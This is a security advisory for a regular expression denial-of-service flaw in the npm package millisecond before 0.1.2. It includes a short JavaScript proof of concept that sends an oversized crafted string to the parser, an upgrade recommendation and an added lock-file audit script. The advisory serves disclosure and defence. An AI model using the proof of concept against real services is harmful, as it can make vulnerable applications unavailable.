Description
Regular Expression Denial of Service in millisecond
Versions of millisecond prior to 0.1.2 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.
Proof of concept
    var ms = require('millisecond');

    // Build a string of `len` + 1 copies of `chr` (the original loop uses <=).
    var genstr = function (len, chr) {
        var result = "";
        for (var i = 0; i <= len; i++) {
            result = result + chr;
        }
        return result;
    };

    // The length of the digit run is taken from the command line; the trailing
    // " minutea" is a unit the parser never matches, so the regex backtracks.
    ms(genstr(Number(process.argv[2]), "5") + " minutea");
Recommendation
Update to version 0.1.2 or later.
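As an added example, not part of this advisory, the following script checks a package-lock.json for millisecond entries in the affected range (< 0.1.2). The lock-file object is constructed sample data, and the version comparison handles plain three-part versions only.

```javascript
// Added example: audit an npm lock file for vulnerable millisecond versions.
// Assumes lockfileVersion 2/3 ("packages" map) or v1 ("dependencies" tree).
const PATCHED = '0.1.2'; // first fixed release per the advisory

// Parse "MAJOR.MINOR.PATCH" into numbers; pre-release/build suffixes are dropped.
function parseVersion(v) {
  const parts = v.split(/[-+]/)[0].split('.').map(Number);
  if (parts.length !== 3 || parts.some(Number.isNaN)) {
    throw new Error('unsupported version string: ' + v);
  }
  return parts;
}

// Numeric comparison, so "0.1.10" correctly sorts after "0.1.2".
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

function isAffected(version) {
  return compareVersions(version, PATCHED) < 0;
}

// Returns every installed millisecond copy below the patched version.
function findAffected(lock) {
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (/(^|\/)node_modules\/millisecond$/.test(path) && isAffected(meta.version)) {
      hits.push({ path, version: meta.version });
    }
  }
  // lockfileVersion 1 nests transitive deps under "dependencies".
  const walk = (deps, prefix) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const path = prefix + 'node_modules/' + name;
      if (name === 'millisecond' && isAffected(meta.version)) hits.push({ path, version: meta.version });
      walk(meta.dependencies, path + '/');
    }
  };
  walk(lock.dependencies, '');
  return hits;
}

// Constructed sample lock file: one vulnerable copy, one patched nested copy.
const sampleLock = { lockfileVersion: 3, packages: {
  '': { name: 'demo-app', version: '1.0.0' },
  'node_modules/millisecond': { version: '0.1.1' },
  'node_modules/other-lib': { version: '2.3.4' },
  'node_modules/other-lib/node_modules/millisecond': { version: '0.1.2' },
} };

console.log(findAffected(sampleLock));
```

Point it at a real lock file with `findAffected(JSON.parse(fs.readFileSync('package-lock.json', 'utf8')))`; an empty result means no copy in the affected range was found.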
Packages
Name: millisecond (npm)
Affected versions: < 0.1.2
Patched version: 0.1.2
Weaknesses
CWE-1333
CWE-400